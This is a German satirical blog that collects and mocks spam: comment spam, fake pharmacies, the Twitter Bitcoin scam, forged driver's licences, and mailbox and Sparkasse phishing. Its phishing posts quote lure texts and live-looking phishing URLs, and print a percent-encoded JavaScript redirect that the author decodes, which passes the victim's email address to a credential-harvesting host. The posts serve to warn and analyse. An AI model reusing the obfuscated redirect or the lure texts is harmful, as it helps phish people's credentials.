Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Screenshot“

spell casting online

Donnerstag, 30. Juli 2020

So nannte sich der Fluch von Kommentarautor mit seinem schlechten Spamskript und seiner IP-Adresse eines deutschen Hosters (hoffentlich wurde die Hosting-Rechnung im Voraus bezahlt), der den folgenden „Kommentar“ hier auf Unser täglich Spam veröffentlichen wollte, aber am Spamfilter scheiterte:

Name: spell casting online
Homepage: Spellsandpsychics.com
Mailadresse: …@gmail.com

It’s an remarkable article in support of all the internet visitors; they
will get advantaghe froom it I am sure.

Was bietet dieses Krepel mit seiner so SEO-wertig verlinkten Website an? Online-Zauberei? Ja, es ist tatsächlich Online-Zauberei. Gut festhalten, hier kommt Gundel Gaukeley mit ihrem für viel zu viel dafür verbranntes Geld käuflichem Hokuspokus für jede Lebenslage:

Screenshot der mit SEO-Kommentarspam bekannt gemachten Website

Sicher und bequem über Paypal oder Kreditkarte zu bezahlende Online-Hexerei! Wenn das Mittelalter aufs Internet trifft, der Aberglaube sich mit unverstandener Technik kombiniert, dann schrumpft das Hirn und kriegt das Geld wie von Zauberhand Flügel und flattert von dannen. 💸

Willkommen in einem 21. Jahrhundert, das ich mir vorher irgendwie anders vorgestellt habe. Wohin man auch schaut, die Dummheit erstickt alles. 🤪

Zu schade nur, dass die gute Zauberexpertin noch keinen Zauberspruch kennt, mit dem sie ihre Website bekannt machen kann. Und Geld herbeizaubern kann unsere Spamhexe auch nicht, so dass sie lieber ihre Hexerei als Dienstleistung verkauft. Deshalb muss sie auch spammen. Aber keine Sorge, vielleicht funktionieren ja die anderen Zaubersprüche. 🤦

Übrigens: Ein erheblicher Anteil der Kommentarspams hat IP-Adressen aus der BRD. Da wird einfach kurz mit Namen und Bankkonto eines unbeteiligten Dritten, dessen Daten sich die Spammer auf andere Weise geholt haben, ein Serverchen gemietet, auf dem die Spamskripten laufen können, und dann werden deutsche Websites vollgespammt, bis die Leitung qualmt. Der Hoster kann froh sein, wenn er dafür überhaupt Geld sieht. Ich bin mir sicher, dass diese Hexe in Kürze auch „deutschsprachige“ Kommentare aus einem Dada-Baukasten für Standardkommentare spammt. Wer Geoblocking als wichtigste Strategie zur Spamvermeidung nutzt, sperrt nicht nur Menschen aus, die Wert auf ihre Privatsphäre legen und ein VPN oder ein Anonymisierungsnetzwerk nutzen, nein, er wird auch zugespammt. 🙁

Also vergesst Geoblocking! Es ist meistens eine dumme Idee.

Tatty Generic Aids

Dienstag, 21. Juli 2020

So so, gewöhnliche Hilfen von Dr. Schäbig. Da bin ich aber heiß drauf! 🚑

Tatty Generic Aids

Das hast du schon im Betreff gesagt, Spammer. Und es wird durch die Wiederholung kein bisschen weniger schäbig. Und nein, es wirkt auch nicht intelligenter oder eindringlicher. Es ist einfach nur mechanisch und dumm. 🧟

Order high quality pills without limits!

Eine grenzenlose Welt hochqualitativer Pillen zum Leerkaufen und in sich reinschmeißen! Von Dr. rer. spam. Schäbig. Was kann dabei schon schiefgehen. Zu Risiken und Nebenwirkungen lesen sie die Todesanzeigen oder fragen sie ihren lokalen Bestattungsunternehmer! 💊💀

Worldwide shipping and 24/7 ordering

Man kann nicht nur rund um die Uhr bestellen, es wird sogar etwas geliefert, und zwar…

Have your order delivered free of charge!

…erfreulich ki-ka-kostenlos. Und auf dem ersten Blick sehen die pillz aus den meist russischen oder chinesischen Dreckskellern ganz ähnlich wie Medikamente aus. Die Farbe ist gut getroffen, und die Verpackung ist kaum vom Original zu unterscheiden. Wenn man Glück hat, wurden keine giftigen Chemieabfälle in die Zementmischer der mafiösen Dreckslabore gekippt und die pillz sind nur von minderwertiger Qualität. Also nicht direkt tödlich, sondern „nur“ ein bisschen gefährlich. Und wenn man noch mehr Glück hat, bekommt man gar nichts geliefert. Dann ist man zwar sein als Vorkasse abgelegtes Geld los, aber bleibt dafür wenigstens am Leben. 🍀

Enter market here

Klicken sie hier, um die Hölle zu betreten. 🖱️🔥

Der Link geht in ein von Crackern kriminell übernommenes WordPress-Blog, wo es nur eine Weiterleitung auf die Website in der Domain brandprice (punkt) su gibt. Und dort gibt es auch eine Website. Standesgemäß für eine spambeworbene Giftapotheke ohne jedes Impressum. Die Website sieht natürlich auch aus, und zwar so:

Screenshot der spambeworbenen Giftpillen-Apotheke

So schade, dass dieser freundliche, unter „CanadaPharmacy“ firmierende Apotheker mal wieder nur Pillen für den Pimmel im Angebot hat und einem nicht weiterhelfen kann, wenn man lästige und quälende Erkältungssymptome hat. Aber dafür liefert er angeblich verschreibungspflichtige Arzneien auch ohne ärztliches Rezept und ist damit in der ganzen zivilisierten Welt klar illegal. Deshalb hat er ja auch kein Impressum. Sonst käme ja die Polizei vorbei und würde diese lästigen Handschellen anlegen, und im Knast könnte er sein ergaunertes Geld gar nicht mehr bei Nutten und Kokain verprassen. Klar, dass er da keine Lust drauf hat. 💶

If You have problems, please visit this link in Your browser:
http://marinade-jet.com/wp-content/Bac_Sujets_3.php

Wer im Jahr 2020 immer noch nicht verstanden hat, wie man einen Link anklickt, kann alternativ auch die Adresse der von Kriminellen im gecrackten WordPress-Blog hochgeladenen Weiterleitungsseite über die Zwischenablage in die Adresszeile seines Browsers kopieren. Wer ein Geschäft so macht, wie es dieser schäbige Giftapotheker mit seinem Pimmelpillenverkauf macht, der darf keine Form der Dummheit, Blödheit und Idiotie unter seinen Kunden ausschließen – denn Menschen mit halbwegs normaler Intelligenz und Lebenserfahrung fallen eh nicht darauf rein, sondern nur die… ähm… intellektuell Herausgeforderten. Sogar solche, denen das Anklicken eines Links ein bisschen schwerfällt, können ja noch von ihrem Geld getrennt werden. 💸

Ob die Leute das überleben, ist dem spammenden Giftapotheker egal. Der interessiert sich nur für das Geld. 🤑

Vorschussbetrugseinleitung des Jahres

Donnerstag, 16. Juli 2020

Tweet von @TwitterSupport@twitter.com, verifizierter Kanal, vom 15. Juli 2020, 23:45 Uhr – der Original-Tweet ist inzwischen gelöscht:

-- I am giving back my community due to Covid-19! All Bitcoin sent to my address below will be send back doubled. If you send $1000, I will send back $2000! -- Bitcoin-Adresse -- Only doing this for the next 30 Minutes! Enjoy!

Der überlagerte Schriftzug „SPAM“ ist natürlich von mir, um die Verwendung dieses Screenshots in einem immer noch laufenden Vorschussbetrug zu erschweren. Ich bin nicht so gern Bildhoster für Verbrecher. 😉

Wer hätte gedacht, dass die Zentralisierung der Kommunikation über die Websites irgendwelcher Unternehmen ohne seriöses Geschäftsmodell eine ganz schlechte Idee ist? Doch nur ein Mensch mit Gehirn. Ohne Gehirn kann man da ja gar nicht drauf kommen. Wenn Social-Media-Websites gecrackt werden – von Crackern natürlich, denn ihr wisst ja, die cracken nun einmal – dann bieten eben auf einmal Bill Gates, Elon Musk, Jeff Bezos, Apple und Uber eine leicht zu nutzende Geldsteckdose zum Verdoppeln von Bitcoin an. Natürlich stimmt das nicht, und natürlich handelt es sich bei diesen Tweets um Fälschungen eines Kriminellen, der bis jetzt allein über diesen Angriff einen sechsstelligen Dollarbetrag erschwindelt hat. Was er an weniger auffälligen Angriffen laufen hat, weiß ich nicht, aber dass dieser Kriminelle beinahe Vollzugriff auf Twitter hat, ist wohl offensichtlich, und er wird schon etwas damit anzufangen wissen.

Welche teilweise weit in die Privat- und Intimsphäre ragenden Daten bei diesem Angriff auf Twitter mitgenommen wurden, erfahren wir wohl erst in den nächsten Tagen. Oder es wird verschwiegen. Jenen, die das Versprechen Twitters von „sichereren Twitter“ dank Zwei-Faktor-Authentifizierung geglaubt haben und die brav ihre Telefonnummer angegeben haben, gratuliere ich recht herzlich. Wie man an den Übernahmen verifizierter Accounts sehen kann, hat die Zwei-Faktor-Authentifizierung nicht vor einer kriminellen Übernahme des Accounts geschützt, sondern nur eine Telefonnummer gegenüber einem datensammelnden Dritten in börsennotierter Reklamevermarktungslogik preisgegeben. Ist ja schön, wenn mal wieder jemand anruft. Und mit einen bisschen Glück sind die ganzen vom Wischofon mitgenommenen Daten – ihr habt ja alles nichts zu verbergen gehabt und hattet deshalb niemals Probleme mit trojanischen Apps wie der Twitter-App – ebenfalls in den Händen von Verbrechern und werden sicherlich demnächst auf den üblichen Marktplätzen für Verbrecher verhökert. Tja, wenn euch doch nur vorher jemand gewarnt hätte! Und die Smartphones sind ja so toll. Wenns Internet im Handy ist, ists Gehirn im Arsch. 📱🧠🔥

Ich finde es übrigens schade, dass beim Vorschussbetrug nicht für unterschiedliche Twitter-Kanäle unterschiedliche Bitcoin-Wallets verwendet wurden. Eine kleine Statistik aus der Alltagspraxis, wessen Follower wie naiv und leichtgläubig sind, wäre schon sehr interessant gewesen – und nicht besonders schmeichelhaft für Apple, nehme ich mal an. :mrgreen:

Den USA wünsche ich viel Spaß bei ihrem Twitter-Wahlkrampf zur Präsidentenwahl im November. Angesichts des sehr banalen Betruges kann der Crackerangriff auf Twitter wohl nicht so schwierig gewesen sein… und inzwischen läuft ja auch ein Großteil der politischen Kommunikation über diese Social-Müll-Dienste. :mrgreen:

clark wilson

Mittwoch, 1. Juli 2020

Perlen der täglichen Kommentarspam

So nannte sich das hirnlose Gesäuge mit seiner IP-Adresse der Leaseweb Deutschland GmbH¹, der heute um 12:01 Uhr seine gefälschten Führerscheine mit folgender Kommentarspam zu einem sechs Wochen alten Artikel hier auf Unser täglich Spam verkaufen wollte:

Um einen deutschen zu beantragen, Österreichischen Führerschein, Schweizer Führerschein kontakt
(Whatsapp +491577562■■■■) (WhatsApp… +436812081■■■■) Kaufen Führerschein | kaufen Schweizer Führerschein | kaufen Österreich Führerschein | kaufen Deutscher Führerschein Kaufen Sie Kroatien Führerschein, Kaufen Sie einen tschechischen, Führerschein Kaufen Sie den niederländischen Führerschein

http://www.xn--fhrerscheinlocal-jzb.de/
Kontakt E-Mail ……. fuhrerscheinlocal@gmail.com
Allgemeine Unterstützung ……. veritabledocs24@gmail.com
(WhatsApp Deutschland… +491577562■■■■)
(WhatsApp Österreichp… +436812081■■■■)

NB: Wir sind hier, um Menschen zu helfen, die dringend Hilfe benötigen und Probleme beim Erwerb ihrer Lizenzen haben oder die Verbote hatten.

Beantragen Sie einen echten registrierten Führerschein, einen Deutscher Führerschein, einen österreichischen Führerschein, einen Schweizer Führerschein, einen deutschen Führerschein, einen EU-Führerschein, einen Führerschein erneuern und einen Führerschein austauschen.

Wir sind einzigartige Hersteller von nur echten registrierten Lizenzen. Echte echte Datenbank registriert. Wir können Ihnen eine neue Lizenz garantieren, auch wenn Sie mit Hilfe unserer Partner in verschiedenen Verkehrsbüros ein Verbot erhalten haben.

KONTAKT
Kontakt E-Mail ……. fuhrerscheinlocal@gmail.com
Allgemeine Unterstützung ……. veritabledocs24@gmail.com
(WhatsApp Deutschland… +491577562■■■■)
(WhatsApp Österreichp… +436812081■■■■)

Website…….. http://führerscheinlocal.de/kaufen-deutscher-fuhrerschein/
Website …….. http://führerscheinlocal.de/schweizer-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-osterreich-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-eu-fuhrerschein/
Website … http://führerscheinlocal.de/kontakt-uns/

Erkundigen Sie sich nach Ihrem Führerschein, insbesondere für EU-Länder.
Echt eingetragener USA (USA) Führerschein
Echt belgischer Führerschein
Echter brasilianischer (brasilianischer) Führerschein
Real Canadian (Canada) Führerschein
Echter finnischer (Finnland) Führerschein
Echt Französisch (Frankreich) Führerschein
Echter deutscher Führerschein
Real Dutch (Netherlands / Holland) Führerschein
Real Israel Pässe Führerschein
Beziehen Sie den Führerschein von Real UK (Vereinigtes Königreich)
Echt Spanisch (Spanien) Führerschein
Echter mexikanischer (Mexiko) Führerschein
Kaufen Sie original Austria Führerschein
Kaufen Sie echte kanadische Führerscheine,
Kaufen Sie echte Französisch (Frankreich) Führerscheine,
Legit Dutch (Netherlands / Holland) Führerscheine,
Immobilien Deutsch (Deutschland) Führerschein,
Sale Real UK (Großbritannien) Führerscheine,

Schlüsselwörter:

- Kaufen Sie einen EUCARIS-registrierten Führerschein
– Kaufen Schweizer Führerschein
– Kaufen Österreich Führerschein
-Kaufen Deutscher Führerschein
– Dokumente online kaufen und erneuern
-Kaufen Sie einen echten registrierten EU-Führerschein
– EU-Führerschein kaufen
-Kaufen Sie einen Original-Führerschein
– Kaufen Sie einen echten registrierten Führerschein online
-Führerschein online erneuern
-EU-Führerschein online kaufen
–Echten Führerschein online kaufen
– Legalen Führerschein online kaufen
– EU-Führerschein kaufen
– UK Führerschein kaufen
–Treiberlizenzaustausch
-Führerscheinaustausch
– Besorgen Sie sich einen echten EU-Führerschein, ohne Prüfungen zu schreiben
–Kaufen Sie online einen echten registrierten EU-Führerschein
–Kaufen Sie einen echten Führerschein

KONTAKTIEREN SIE UNSERE SUPPORTER

Kontakt E-Mail ……. fuhrerscheinlocal@gmail.com
Allgemeine Unterstützung ……. veritabledocs24@gmail.com
(WhatsApp Deutschland… +491577562■■■■)
(WhatsApp Österreichp… +436812081■■■■)

Website …….. http://führerscheinlocal.de/kaufen-deutscher-fuhrerschein/
Website …….. http://führerscheinlocal.de/schweizer-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-osterreich-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-eu-fuhrerschein/
Website … http://führerscheinlocal.de/kontakt-uns/

Statt vieler Worte für alle Freunde der spontanen Heiterkeit nur der Screenshot dieses „weltweiten Führerscheindienstleisters“ mit seinen „echten“ Führerscheinen:

Screenshot der betrügerischen Website

Wer mir nicht glauben will, dass es sich bei diesen „Führerscheinen“ um Fälschungen handelt, und das zur Strafe für das Fahren ohne Fahrerlaubnis noch eine weitere Strafe für die Benutzung einer gefälschten Urkunde der Bundesrepublik Deutschland hinzukommt, frage bitte einfach mal auf der nächsten Polizeidienststelle! 👮

Aber auf gar keinen Fall auf solche spammenden Idioten reinfallen! Es ist teuer. Und die Vorstrafe kommt gleich hinterher.

¹Ich hoffe, Leaseweb hat Vorkasse genommen, denn dieser Verbrecher wird ganz sicher keine Rechnung bezahlen, nachdem er die Dienstleistung unter Missbrauch der Daten eines anderen Menschen in Anspruch genommen hat.

Fix pending mail issue.

Montag, 29. Juni 2020

Nicht drauf reinfallen, es ist Phishing! 🚨

Von: Web Admin <uk@fascil.shop>

Hier spammt der Administrator noch selbst, und…

An: gammelfleisch@tamagothi.de

…weil er das ganze Web nach irgendwelchen Mailadressen durchsucht, landet er mit seinem kriminellen Kommunikationsversuch auch prompt im Töpfchen für Sieger. 🚽

You have new pending messages

Echt? 🕵️

$ ssh -l name mailserver.example.org
name@mailsever.example.org $ mailq
Size             Queue ID                                                    Date
User             From
Status           Recipient
---------------- ---------------------------------------------------------
   0 messages.
name@mailsever.example.org $ _

Nein, habe ich nicht. Der Spammer lügt. 🤥

Dear gammelfleisch@tamagothi.de

Aber so was von ganz genau mein Name mal wieder! 👏

You have 7 New pending mails under the tamagothi.de mail network server. Your mail version 2.0.1 is currently being discontinued from receiving incoming e-mail, and will no longer work 48 hours from 6/27/2020

Was lernen wir aus diesem kurzen Absatz?

  1. Sieben E-Mails können angeblich nicht zugestellt werden. ✉️
  2. Das liegt daran, dass ich immer noch Mail in der Version 2.0.1 verwende, und das kriegt jetzt völlig grundlos keine Mail mehr. 🖕
  3. Wenn ich jetzt nicht von Unkenntnis und Panik getrieben ganz schnell und völlig hirnlos reagiere, funktioniert E-Mail in ein paar Minuten gar nicht mehr für mich. Und zwar ebenfalls grundlos. 🥊🧠

Das ist natürlich Quatsch. Die Protokolle SMTP, IMAP und POP3 sind seit Jahrzehnten praktisch unverändert. Allerdings wurde immer wieder einmal eine kleinere Erweiterung angeflanscht, am häufigsten wohl an SMTP… 😉

Es werden also keine neuen „Mailversionen“ benötigt, um auf E-Mail zuzugreifen. Wenn ich es wollte, könnte ich wohl immer noch mit zehn Jahre alter Mailsoftware meine E-Mail erledigen. Aber wer will schon mit uralten Programmen voller ungefixter Sicherheitslöcher im Internet unterwegs sein, wenn es auch gute aktuelle Software gibt? ☠️

Dieser spammende „Web Admin“ lügt. Das von ihm behauptete Problem existiert nicht. Sein Gefasel soll nur Menschen mit geringen technischen Kenntnissen verblenden, erschrecken und unter gefühlten Zeitdruck setzen, damit sie jetzt klicken:

To retrieve your messages and upgrade to version 5.0.1, kindly follow the information below.

RESTORE MESSAGES NOW

Wer da klickt, lasse alle Hoffnung fahren! 🖱️🔥

$ lynx -mime_header https://wbbw3902889101.us-south.cf.appdomain.cloud/?35d44a299d135d44a299d1a2ba7c89f62ca2ba7c89f62c#gammelfleisch@tamagothi.de:35d44a299d1a2ba7c89f62c=377237g-
HTTP/1.0 200 OK
X-Backside-Transport: OK OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 29 Jun 2020 11:32:47 GMT
Server: Apache
Vary: Accept-Encoding
X-Global-Transaction-ID: 0d28ff5e5ef9d15f91a769e7
Connection: close
Content-Length: 2426

<script type="text/javascript">
  document.write(
    unescape(
      "%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%20%20%0A%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%0A%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%72%74%77%6F%64%6B%6C%70%22%3E%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%6E%61%6D%65%3D%22%64%65%6C%73%6B%6A%6D%22%20%73%69%7A%65%3D%22%33%35%22%20%76%61%6C%75%65%3D%22%22%3E%0A%3C%2F%66%6F%72%6D%3E%0A%3C%2F%64%69%76%3E%0A%0A%0A%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%6C%6F%63%61%74%65%20%3D%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%0A%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%20%3D%20%6C%6F%63%61%74%65%0A%76%61%72%20%74%65%78%74%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%0A%0A%0A%0A%66%75%6E%63%74%69%6F%6E%20%64%65%6C%69%6E%65%61%74%65%28%73%74%72%29%7B%0A%0A%74%68%65%6C%65%66%74%20%3D%20%73%74%72%2E%69%6E%64%65%78%4F%66%28%22%23%22%29%20%2B%20%31%3B%0A%74%68%65%72%69%67%68%74%20%3D%20%73%74%72%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%22%3A%22%29%3B%0A%72%65%74%75%72%6E%28%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%74%68%65%6C%65%66%74%2C%20%74%68%65%72%69%67%68%74%29%29%3B%0A%7D%0A%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%0A%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%73%3A%2F%2F%77%62%62%77%33%39%30%32%38%38%39%31%30%31%2E%75%73%2D%73%6F%75%74%68%2E%63%66%2E%61%70%70%64%6F%6D%61%69%6E%2E%63%6C%6F%75%64%2F%63%6F%6E%66%69%67%2F%74%6F%6B%65%6E%2F%3F%33%35%64%34%34%61%32%39%39%64%31%61%32%62%61%37%63%38%39%66%36%32%63%3D%22%20%2B%20%64%65%6C%69%6E%65%61%74%65%28%74%65%78%74%29%20%2B%20%22%26%30%30%30%39%79%79%65%69%6E%73%38%32%30%74%6E%74%49%44%3D%31%6B%62%72%33%38%38%77%6E%6A%33%66%36%35%61%63%63%2D%64%32%65%37%2D%30%39%38%75%2D%3A%6A%6E%73%64%6A%6A%38%38%39%30%30%30%77%30%22%3B%0A%7D%2C%20%30%30%30%30%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%0A%0A%3C%2F%68%74%6D%6C%3E%0A%0A"
    )
  );
</script>
$ _

[Ja, ich kann die gammelfleisch-Adresse ruhig über eine im Link enthaltene, eindeutige ID bestätigen. Diese Adresse liegt sowieso als Magnet für Spammer im Impressum und kann von jedem Idioten des Internet direkt mit einem Skript aus einer offenen Quelle ausgelesen werden. Mit einer Mailadresse, die ich von Spam freihalten will, würde ich das allerdings nicht machen. Es wäre sehr dumm.]

Ach, so macht man Websites heute. Man schreibt sein HTML-Markup nicht mehr einfach rein, sondern programmiert stattdeseen Javascript, damit ein Programm das HTML-Markup reinschreibt.

Kein Mensch hätte einen derartigen überumständlichen Mummenschanz nötig. Hier will ein krimineller Idiot automatische Analysen erschweren. Aber zum Glück gibt es dafür Abhilfe, wenn man das generierte HTML mal lesen will (Javascript muss dafür erlaubt werden). Ja, ich könnte das auch schnell selbst mit einem dieser erschröcklich anzuschauenden Perl-Einzeiler machen, aber die eben verlinkte Seite kann jeder Mensch benutzen. Vielleicht hat ja der eine oder andere Mitleser auch Interesse. 😉

Beim „Rückgängigmachen der Unlesbarmachung“ kommt folgendes HTML heraus:

<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
      

<div style="display: none;">
<form name="rtwodklp">
<input type="hidden" name="delskjm" size="35" value="">
</form>
</div>


<script>
var locate = window.location
document.rtwodklp.delskjm.value = locate
var text = document.rtwodklp.delskjm.value



function delineate(str){

theleft = str.indexOf("#") + 1;
theright = str.lastIndexOf(":");
return(str.substring(theleft, theright));
}
setTimeout(function() {
  window.location.href = "https://wbbw3902889101.us-south.cf.appdomain.cloud/config/token/?35d44a299d1a2ba7c89f62c=" + delineate(text) + "&0009yyeins820tntID=1kbr388wnj3f65acc-d2e7-098u-:jnsdjj889000w0";
}, 0000);
</script>
</head>
</body>


</html>

Auf so eine tolle Idee muss man auch erstmal kommen! Mit Javascript HTML generieren, das wiederum Javascript beinhaltet, das dann auf eine andere Adresse weiterleitet. Auf so eine Idee kommt nicht jeder. Dafür muss man schon eine vollständig ausgebrannte Blitzbirne sein. 💡

Übrigens: Wer einen Javascript-Blocker benutzt, kann auf Kriminelle, die ihre Absichten dermaßen trickreich vor automatischen Analysen verstecken, niemals hereinfallen. Tut das einfach, wenn es auch in den ersten Tagen ein bisschen unbequem sein kann, mit ein paar Klicks ein paar sinnvolle Ausnahmen zu konfigurieren. Danach hat man viel für seine Computersicherheit getan, und das kann schnell eine Menge Zeit, Geld und Ärger ersparen. 🛡️

Am Ende einiger weiterer Weiterleitungen landet man auf der folgenden Phishing-Website:

Screenshot der Phishing-Seite

Die Zugangsdaten für die eigene Mailadresse, die man dort eingeben soll, gehen direkt an Kriminelle und werden für betrügerische Machenschaften unter fremder Identität benutzt. Das gilt übrigens auch, wenn man hinterher eine scheinbare Fehlermeldung der Marke „falsches Passwort“ angezeigt bekommt. 🙁

Und danach hat man den Schaden. 😫

Die Polizei ermittelt zunächst gegen den Inhaber der Mailadresse, und die Verbrecher bleiben in ihrer Anonymität und bekommen leider keinen längeren Aufenthalt im JVA-Hotel. Dass sie keine „verdächtige“ Freemailer-Adresse benutzen, gibt ihren Betrugsgeschäften sogar noch eine höhere Seriosität und ermöglicht ihnen, einen noch größeren Schaden anzurichten.

Ach ja, die eigene Mailadresse ist danach natürlich auch verbrannt.

Regard

Email Admin 2020 | All rights reserved.

Diese Spam wurde mechanisch erstellt und ist ohne Unterschrift gültig. Natürlich mit proklamierten „geistigen Eigentum“ auf mechanischen Output. 🤡

sdk.rethinkrobotics.com

Montag, 1. Juni 2020

So nannte sich der Honk mit seiner deutschen IP-Adresse eines großen, international tätigen Hosters, der heute um 10:59 Uhr den folgenden Kommentar hier auf Unser täglich Spam veröffentlichen wollte, aber am Spamfilter scheiterte:

Have you ever thought about creating an e-book or guest authoring on other websites?
I have a blog based on the same subjects you discuss and would love to have you share some stories/information. I know my viewers would value your work.
If you‘re even remotely interested, feel free to shoot me an e mail.

Nein, Spammer, ich habe kein Interesse daran, für so einen kommentarspammenden Ekel-SEO aus der letzten Reihe wie dich irgendwelche Texte zu schreiben, und nein, wenn ich dir etwas „rüberschießen“ möchte, dann ist es ganz sicher keine E-Mail, sondern etwas mit deutlich mehr Mannstoppwirkung. 🔫

Deine lustige Website, mit der du mutmaßlich Menschen indonesischer Zunge dazu bringen willst, dass sie ihr bisschen meist bitter erarbeitetes Geld in windigen bis betrügerischen Internet-Casinos verlieren – kennt man ja, bei den „kostenlosen Probespielen“ wird gewonnen, bei den Spielen um Geld dann nicht mehr so – damit du Fäkalmade ein paar Affiliate-Judasgroschen kriegst…

Screenshot der durch SEO-Spam beworbenen Website

…darfst du dir gern hinstecken, wo die Sonne niemals hinscheint. 🖕

Du bist widerlich! 🤮

Wichtige information

Samstag, 30. Mai 2020

Abt.: Ganz schlechtes Phishing

Obwohl diese Phishingspam wirklich nicht gut gemacht ist und in ihrer Einheit aus Stil und Sprache für große Heiterkeit bei mir gesorgt hat, halte ich sie für gefährlich, da sie auch durch empfindlich eingestellte Spamfilter hindurchkommt. Deshalb vorab ganz deutlich: Nein, diese E-Mail kommt nicht von der Sparkasse.

Von: Ihre_Sparkasse <assist@vitamind310000.com>

Der Absender hat sich nicht die Mühe gegeben, seine gefälschte Absenderadresse so zu fälschen¹, dass es wenigstens ein bisschen danach aussieht, als käme diese Spam von der Sparkasse. So ist sofort klar, dass es eine Spar von der Spamkasse ist – und einfach ungelesen gelöscht werden kann. 🛑

Den meisten Menschen war das schon beim Betreff klar. Denn denkende und fühlende Wesen schreiben in einem Betreff nicht 🚨WICHTIG!🚨 rein, sondern machen klar, um was es in der E-Mail geht. 😉

Spätestens der Text dieser Spam sollte klar machen, dass hier nicht die Sparkasse schreibt, denn dort können die Menschen Deutsch und klingen nicht wie ein Clown nach der Inhalation von Lachgas. 🤡

Sehr geehrter Kunde,,
Aufgrund der aktuellen Situation mit dem Coronavirus empfiehlt Sparkasse Ihnen, zu Hause zu bleiben und alle Bankgeschäfte sicher online im Internet durchzuführen. Es ist auch sehr wichtig, dass Sparkasse immer aktuelle Informationen hat und Sie im richtigen Moment kontaktieren kann. Wir empfehlen Ihnen dringend, die aktuellen Kontaktdaten und sonstigen Daten zu aktualisieren und zu bestätigen, indem Sie auf die Schaltfläche unten klicken.
Daten zu aktualisieren
Mit freundlichen Grüßen, Ihre Sparkasse.
© © 2020 Sparkassen-Finanzportal

Einmal ganz davon abgesehen, dass die richtige Sparkasse schreiben würde, um welches Konto es sich handelt. Denn sehr viele ihrer Kunden unterhalten mehr als ein Konto, etwa, um Einkünfte aus selbstständiger Tätigkeit sauber von ihrem Privatkram zu trennen.

Der Link aus der Spam führt natürlich nicht zur Sparkasse, sondern in eine Website in einer obskuren Domain, wo es nichts als eine Weiterleitung…

$ mime-header https://kundenportal.page.link/die_sparkasse
HTTP/2 302 
content-type: application/binary
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 30 May 2020 11:46:49 GMT
location: https://sparkassen-finanzportal.top/prufen/private/data
content-length: 0
content-security-policy: script-src ‚nonce-VyLvdsLwWT4J1iSamUexXQ‘ ‚unsafe-inline‘;object-src ‚none‘;base-uri ’self‘;report-uri /_/DurableDeepLinkUi/cspreport;worker-src ’self‘
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3-27=“:443″; ma=2592000,h3-25=“:443″; ma=2592000,h3-T050=“:443″; ma=2592000,h3-Q050=“:443″; ma=2592000,h3-Q049=“:443″; ma=2592000,h3-Q048=“:443″; ma=2592000,h3-Q046=“:443″; ma=2592000,h3-Q043=“:443″; ma=2592000,quic=“:443″; ma=2592000; v=“46,43″

$ whois sparkassen-finanzportal.top | grep -i ^creation
Creation Date: 2020-05-28T20:10:02Z
$ _

…in eine Website in einer erst vorgestern eingerichteten Domain gibt, die irgendwie nach „Sparkasse“ klingen soll. Dort bekommt man eine „liebevoll“ nachgemachte Login-Seite im Sparkassen-Design präsentiert:

Screenshot der Phishing-Site

Alle Daten, die man dort in einem mehrschrittigen Verfahren eingibt – begonnen mit der Anmeldung, weiter über die Anschrift bis hin zu Konto- und Kreditkartendaten – gehen direkt an gewerbsmäßig vorgehende Betrüger. Wer darauf reingefallen ist, hat jahrelangen Ärger mit seiner missbrauchten Identität, diversen Inkassoklitschen, Ermittlungen der Staatsanwaltschaft wegen aller möglichen Delikte, Einträgen bei der Schufa und anderen Auskunfteien und dergleichen mehr. Das Geld, das man dabei verliert, erstattet einem keine kulante Bank. 💸

Zum Glück gibt es ein ganz einfaches und hundertprozentig wirksames Mittel gegen Phishing: Niemals in eine E-Mail klicken! Wenn man Websites – wie etwa die seiner Bank – immer über ein Lesezeichen im Browser aufruft, kann einem niemals von Trickbetrügern ein „vergifteter Link“ untergeschoben werden. Nach einer ganz normalen Anmeldung stellt man fest, dass das in einer obskuren E-Mail behauptete Problem gar nicht existiert und löscht die Spam. So einfach ist es, einen kriminellen Angriff abzuwehren und sich selbst vor einigen tausend Euro Verlust und mehreren Jahren verhagelter Lebenszeit zu bewahren.

